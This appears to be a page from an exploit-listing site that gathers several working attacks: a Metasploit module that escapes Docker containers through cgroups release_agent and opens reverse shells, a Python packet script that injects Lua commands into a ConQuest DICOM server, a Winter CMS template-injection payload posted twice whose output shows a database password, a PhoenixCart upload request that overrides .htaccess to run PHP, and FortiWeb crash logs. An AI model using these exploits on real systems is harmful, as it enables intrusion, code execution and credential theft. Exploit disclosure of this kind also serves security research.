Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Docker cgroups Container Escape', 'Description' => %q{ This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Yiqi Sun', # discovery 'Kevin Wang', # discovery 'T1erno', # POC ], 'Platform' => [ 'unix', 'linux' ], 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, 'Privileged' => true, 'References' => [ [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'], [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'], [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'], [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'], [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'], [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'], [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'], [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'], [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'], [ 'CVE', '2022-0492'] ], 'DisclosureDate' => '2022-02-04', 'Targets' => [ ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }], ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def base_dir datastore['WritableDir'] end def check print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu') release = kernel_release # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492 release_short = Rex::Version.new(release.split('-').first) release_long = Rex::Version.new(release.split('-')[0..1].join('-')) if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10 release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable") end CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS") end def exploit # Check if we're already root as its required fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root? # create mount folder = rand_text_alphanumeric(5..10) @mount_dir = "#{base_dir}/#{folder}" register_dir_for_cleanup(@mount_dir) vprint_status("Creating folder for mount: #{@mount_dir}") mkdir(@mount_dir) print_status('Mounting cgroup') cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'") group = rand_text_alphanumeric(5..10) group_full_dir = "#{@mount_dir}/#{group}" vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}") mkdir(group_full_dir) print_status("Enabling notify on release for group #{group}") write_file("#{group_full_dir}/notify_on_release", '1') print_status('Determining the host OS path for image') # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of mtab_file = read_file('/etc/mtab') host_path = nil mtab_file.each_line do |line| next unless line.start_with?('overlay') && line.include?('perdir') # upperdir line.split(',').each do |parameter| next unless parameter.start_with?('upperdir') parameter = parameter.split('=') fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1 host_path = parameter[1] end break end fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command vprint_status("Host OS path for image: #{host_path}") payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}" print_status("Setting release_agent path to: #{host_path}#{payload_path}") write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}" print_status("Uploading payload to #{payload_path}") if target.name == 'CMD' # for whatever reason it's unhappy and wont run without the /bin/sh header upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n" elsif target.name == 'BINARY' upload_and_chmodx payload_path, generate_payload_exe end register_files_for_cleanup(payload_path) print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"") cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'")) end def cleanup if @mount_dir vprint_status("Cleanup: Unmounting #{@mount_dir}") cmd_exec("umount '#{@mount_dir}'") end super end end </code></pre>

<pre><code>#!/usr/bin/env python3 # --------------------------------------------------------- # preauth rce poc for ConQuest Dicom Server (1.5.0d) # --------------------------------------------------------- # 04.08.2023 @ 22:07 # # code610 blogspot com # import socket target = '192.168.56.106' rport = 5678 pkt1 = b"\x01\x00\x00\x00\x00\xd0\x00\x01\x00\x00\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31" pkt1 += b"\x20\x20\x20\x20\x20\x20\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x20\x20\x20\x20" pkt1 += b"\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" pkt1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" pkt1 += b"\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e\x31" pkt1 += b"\x20\x00\x00\x2e\xcb\x00\x00\x00\x30\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31" pkt1 += b"\x40\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x32" pkt1 += b"\x50\x00\x00\x3d" pkt1 += b"\x51\x00\x00\x04\x00\x00\x80\x00" pkt1 += b"\x52\x00\x00\x22\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x36\x38\x30\x30\x34\x33\x2e\x32\x2e\x31\x33\x35\x2e\x31\x30\x36\x36\x2e\x31\x30\x31" pkt1 += b"\x55\x00\x00\x0b\x31\x2e\x35\x2e\x30\x2f\x57\x49\x4e\x33\x32" pkt2 = b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00" pkt2 += b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e" pkt2 += b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00" pkt2 += b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61" pkt2 += b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b" pkt2 += b"\x5b\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x6c\x65\x76\x65" pkt2 += b"\x6c\x3d\x5b\x5b\x50\x41\x54\x49\x45\x4e\x54\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x3d\x7b\x51" pkt2 += b"\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x5b\x5b\x50\x41\x54\x49" pkt2 += b"\x45\x4e\x54\x5d\x5d\x2c\x50\x61\x74\x69\x65\x6e\x74\x49\x44\x3d\x5b\x5b\x5d\x5d\x2c\x50\x61\x74" pkt2 += b"\x69\x65\x6e\x74\x4e\x61\x6d\x65\x3d\x5b\x5b" # super evil command # rce payload: aaaa]],};local t=os.execute("calc");local z{[[ pkt3 = b"" pkt3 += b"\x61\x61\x61\x61\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x74\x3d\x6f\x73\x2e\x65\x78\x65\x63" pkt3 += b"\x75\x74\x65\x28\x22\x63\x61\x6c\x63\x22\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x20\x41\x3d\x7b\x5b\x5b\x41\x42" pkt4 = b"\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x32\x3d\x44\x69\x63\x6f\x6d\x4f\x62\x6a\x65\x63\x74\x3a\x6e\x65\x77\x28\x29\x3b" pkt4 += b"\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x71\x29\x20\x64\x6f\x20\x71\x32\x5b\x6b\x5d\x3d\x76\x20" pkt4 += b"\x65\x6e\x64\x3b\x6c\x6f\x63\x61\x6c\x20\x72\x32\x3d\x64\x69\x63\x6f\x6d\x71\x75\x65\x72\x79\x28\x61\x65\x2c\x20\x6c\x65\x76\x65" pkt4 += b"\x6c\x2c\x20\x71\x32\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x73\x3d\x74\x65\x6d\x70\x66\x69\x6c\x65\x28\x22\x74\x78\x74\x22\x29\x20\x66" pkt4 += b"\x3d\x69\x6f\x2e\x6f\x70\x65\x6e\x28\x73\x2c\x20\x22\x77\x62\x22\x29\x3b\x69\x66\x20\x72\x32\x3d\x3d\x6e\x69\x6c\x20\x74\x68\x65" pkt4 += b"\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x6e\x6f\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x22\x2e" pkt4 += b"\x2e\x61\x65\x2e\x2e\x22\x5c\x6e\x22\x29\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28" pkt4 += b"\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x65\x6e\x64\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x72\x20\x3d\x20\x6c\x6f\x61\x64\x73\x74\x72\x69" pkt4 += b"\x6e\x67\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x22\x2e\x2e\x72\x32\x3a\x53\x65\x72\x69\x61\x6c\x69\x7a\x65\x28\x29\x29\x28\x29\x3b" pkt4 += b"\x72\x5b\x31\x5d\x2e\x51\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x6e\x69\x6c\x3b\x20\x72\x5b\x31" pkt4 += b"\x5d\x2e\x54\x72\x61\x6e\x73\x66\x65\x72\x53\x79\x6e\x74\x61\x78\x55\x49\x44\x3d\x6e\x69\x6c\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x6b" pkt4 += b"\x65\x79\x73\x3d\x7b\x7d\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x72\x5b\x31\x5d\x29\x20\x64\x6f" pkt5 = b"" pkt5 += b"\x20\x69\x66\x20\x74\x79\x70\x65\x28\x76\x29\x7e\x3d\x22\x74\x61\x62\x6c\x65\x22\x20\x74\x68\x65\x6e\x20\x6b\x65\x79\x73\x5b\x23" pkt5 += b"\x6b\x65\x79\x73\x2b\x31\x5d\x3d\x6b\x20\x65\x6e\x64\x20\x65\x6e\x64\x3b\x20\x74\x61\x62\x6c\x65\x2e\x73\x6f\x72\x74\x28\x6b\x65" pkt5 += b"\x79\x73\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x61\x2c\x20\x62\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x73\x74\x72\x69\x6e\x67" pkt5 += b"\x2e\x73\x75\x62\x28\x61\x2c\x20\x31\x2c\x20\x37\x29\x3c\x73\x74\x72\x69\x6e\x67\x2e\x73\x75\x62\x28\x62\x2c\x20\x31\x2c\x20\x37" pkt5 += b"\x29\x20\x65\x6e\x64\x29\x3b\x20\x69\x66\x20\x66\x69\x72\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e" pkt5 += b"\x20\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x76\x2e\x2e\x22\x20\x20\x20" pkt5 += b"\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x69\x66\x20\x66\x69\x72" pkt5 += b"\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x66\x6f\x72\x20\x6b\x2c\x76" pkt5 += b"\x20\x69\x6e\x20\x69\x70\x61\x69\x72\x73\x28\x72\x29\x20\x64\x6f\x20\x20\x20\x66\x6f\x72\x20\x6b\x32\x2c\x76\x32\x20\x69\x6e\x20" pkt5 += b"\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5b\x22\x2e\x2e\x76\x5b\x76" pkt5 += b"\x32\x5d\x2e\x2e\x22\x5d\x20\x20\x20\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65" pkt5 += b"\x6e\x64\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28\x29\x3b" with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: print("+ connecting to target...") s.connect(( target, rport )) print("+ connected!") print("+ sending pkt1...") #s.sendall( pkt1 ) #data1 = s.recv(1024) #print("+ recv pkt1:\n%s" % data1) #print("Data received:\n%s" % data1 ) print("+ sending 2nd and more pkts...") #s.sendall( pkt2 ) #s.sendall( pkt3 ) #s.sendall( pkt3 ) #s.sendall( pkt5 ) allpkts = pkt1 + pkt2 + pkt3 + pkt4 + pkt5 s.sendall(allpkts) print("! should be done :|") </code></pre>

<pre><code># Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ] </code></pre>

<pre><code>## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE ## Author: nu11secur1ty ## Date: 12/06/2023 ## Vendor: https://phoenixcart.org/index.php ## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip ## Reference: https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The Categories/Products Product Images upload function, is ABSOLUTELY NOT SANITIZING WELL for file uploading from any type of extension! In this case, you can see a bypassing of .HTACCESS SECURITY file and uploading an info.php exploit file which info.php can be executed from everywhere for dumping the all information about the server! This can be done on the demo server! Please do not do this! I am a Penetration Tester, not a stupid cracker, and that's why I downloaded it, installed it, and tested it! If you want to test it yourself please download it, install it, and test it! Thank you all! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit execution: ```POST POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1 Host: pwnedhost7.com Content-Length: 2952 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://pwnedhost7.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt Connection: close ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="formid" 733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_date_added" 2023-12-06 11:36:36 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_status" 1 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_quantity" 0 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_date_available" 2023-12-14 00:00:00 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="manufacturers_id" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_model" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_tax_class_id" 1 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_price" 1000.0000 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_price_gross" 1070 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_weight" 1.00 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_gtin" 00000000000001 ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_name[1]" pwned ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_description[1]" pwned your services ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_url[1]" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_seo_title[1]" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_seo_description[1]" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_seo_keywords[1]" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_image_large_1"; filename=".htaccess" Content-Type: application/octet-stream # $Id$ # # This is used to restrict access to this folder to anything other # than images # Prevents any script files from being accessed from the images folder <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> <IfModule mod_authz_core.c> # Require all denied </IfModule> <IfModule !mod_authz_core.c> Order Deny,Allow # Deny from all Allow from all </IfModule> </FilesMatch> Options -Indexes ------WebKitFormBoundaryeDPXR7DpYcn3eWA1 Content-Disposition: form-data; name="products_image_htmlcontent_1" ------WebKitFormBoundaryeDPXR7DpYcn3eWA1-- ``` [+]Response: ```PHP GET /PhoenixCart/images/info.php HTTP/1.1 Host: pwnedhost7.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html) ## Time spent: 00:17:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code># Exploit Title: Winter CMS 1.2.2 / 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 / 1.2.3 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ] </code></pre>

<pre><code>;; ;; FortiWeb VM (v7.4.0 build577) Post-auth CLI Crash ;; ;; (...) ;; ;; code610 / some debug notes fyi ;; ;; 17.11.2023 @ 23:33 ;; FortiWeb # diagnose debug crashlog show 2023-11-16 05:07:00 <004315> application cli 2023-11-16 05:07:00 <004315> *** signal Segmentation fault received *** 2023-11-16 05:07:00 <004315> RIP 00007fdd1febf44f 2023-11-16 05:07:00 <004315> EFLAGS 0000000000010206 2023-11-16 05:07:00 <004315> RAX 0000000000000000 2023-11-16 05:07:00 <004315> RBX 0000000000000005 2023-11-16 05:07:00 <004315> RCX 00005642dd55d4b1 2023-11-16 05:07:00 <004315> RDX 00007ffca74d8ff0 2023-11-16 05:07:00 <004315> RSI 0000000000000000 2023-11-16 05:07:00 <004315> RDI 00007ffca74d82d0 2023-11-16 05:07:00 <004315> RBP 0000000000000000 2023-11-16 05:07:00 <004315> RSP 00007ffca74d8208 2023-11-16 05:07:00 <004315> CS 0000 2023-11-16 05:07:00 <004315> GS 0000 2023-11-16 05:07:00 <004315> FS 0033 2023-11-16 05:07:00 <004315> Trap 000000000000000e 2023-11-16 05:07:00 <004315> Error 0000000000000006 2023-11-16 05:07:00 <004315> Oldmask 0000000000000000 2023-11-16 05:07:00 <004315> CR2 00007ffca74d9020 2023-11-16 05:07:00 <004315> [0x00007fdd1febf44f] ==> /lib64/libc.so.6 + 0x000000000013d44f) 2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193) 2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193) 2023-11-16 05:07:38 <004315> application cli 2023-11-16 05:07:38 <004315> *** signal Segmentation fault received *** 2023-11-16 05:07:38 <004315> RIP 00007fdd1fec034f 2023-11-16 05:07:38 <004315> EFLAGS 0000000000010206 2023-11-16 05:07:38 <004315> RAX 0000000000000000 2023-11-16 05:07:38 <004315> RBX 0000000000000006 2023-11-16 05:07:38 <004315> RCX 00005642dd55403b 2023-11-16 05:07:38 <004315> RDX 00007ffca74d8fe0 2023-11-16 05:07:38 <004315> RSI 0000000000000000 2023-11-16 05:07:38 <004315> RDI 00007ffca74d82d0 2023-11-16 05:07:38 <004315> RBP 0000000000000000 2023-11-16 05:07:38 <004315> RSP 00007ffca74d8208 2023-11-16 05:07:38 <004315> CS 0000 2023-11-16 05:07:38 <004315> GS 0000 2023-11-16 05:07:38 <004315> FS 0033 2023-11-16 05:07:38 <004315> Trap 000000000000000e 2023-11-16 05:07:38 <004315> Error 0000000000000006 2023-11-16 05:07:38 <004315> Oldmask 0000000000000000 2023-11-16 05:07:38 <004315> CR2 00007ffca74d9010 2023-11-16 05:07:38 <004315> [0x00007fdd1fec034f] ==> /lib64/libc.so.6 + 0x000000000013e34f) 